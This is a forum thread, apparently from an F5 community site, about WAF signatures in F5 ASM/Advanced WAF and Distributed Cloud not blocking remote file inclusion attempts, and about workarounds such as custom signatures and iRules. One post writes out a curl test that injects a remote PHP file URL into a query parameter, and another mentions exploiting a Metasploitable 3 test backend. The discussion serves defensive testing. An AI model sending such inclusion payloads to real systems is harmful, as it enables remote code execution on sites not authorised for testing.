Forum Discussion

MVP

Jul 21, 2023

Solved

F5 ASM/AWAF Remote File Inclusion signatures do not block http:// or https:// in the form parameter

Hello, I tested some pentesting attacks like "curl https://x.x.x.x/?niki=http://1.1.1.1/file.php -kv" and the RFI/RFE attack does not get blocked even with RFI signatures beeing enabled as ment...

security

Nikoolayy1
Jul 27, 2023
I tested this on other vendors and it is the same as the info I got is that there are no default signatures for this RFI attack as it will cause many issues an false positives, so you need to make a custom signature/irule to block this for the specific vunrable parameter.

Outside of that for XC Distributed Cloud the Service policy rules seem the way to go for configuring something like signatures:

Nikoolayy1

MVP

Jul 23, 2023

Yes, maybe I am doing the test wrong, still another big issue is that Nginx App Protect also has the option for custom signatures (Configuration | NGINX Ingress Controller) but for now XC Distributed cloud does not and even with all signatures enabled and not in staging the RFI attack is not blocked on XC.

As a test backend with metasploitable 3 you can exploit this vunrability as seen in your picture with the query "page" parameter.

Forum Discussion

F5 ASM/AWAF Remote File Inclusion signatures do not block http:// or https:// in the form parameter

Recent Discussions

redirect not working

Reliable resources for identifying IP addresses

Could not connect to SMTP host.

Viprion files on blades.

The best load balance method on this scenario?

Related Content

Wildcard Parameter signature attack

Support of WAF Signature Staging in F5 Distributed Cloud (XC)

Mitigating JSON-based SQL injection with BIG-IP ASM / Advanced WAF Attack Signatures

Brute Force protection for single parameter like OTP

BoT Defense Profile, Signature Enforcement